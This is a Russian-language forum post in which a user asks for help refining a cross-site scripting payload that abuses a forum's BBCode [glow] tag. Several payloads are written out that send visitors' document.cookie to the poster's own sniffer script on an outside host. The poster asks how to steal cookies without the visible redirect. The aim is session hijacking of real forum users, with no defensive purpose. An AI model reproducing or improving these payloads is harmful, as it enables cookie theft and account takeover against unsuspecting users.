Ситуация такая - есть XSS пробую юзать: [glow=red);background:url(javascript:document.location="http://мойсайт/сниф.php?"%20+document.cookie);filter:glow(color=red,2,300] мое сообщение[/glow] исполняется, но палевно очень, перебрасывая на сниффер. другие вариации не прокатывают, я js не знаю, что можно вставить заместо document.location, как правильно заюзать? например пробовал вот что: [glow=red);background:url(javascript:document.write(img src= "http://**/*.php"+document.cookie); filter:glow(color=red,2,300]текст[/glow] не катит еще:[glow=red);background:url(javascript:new Image(); img.src = "http://***/*.php");filter:glow(color=red,2,300]текст[/glow] не катит а простой алерт нормально прокатывает, подскажите плз, как сформировать, чтоб получить куки, при этом не вставляя как картинку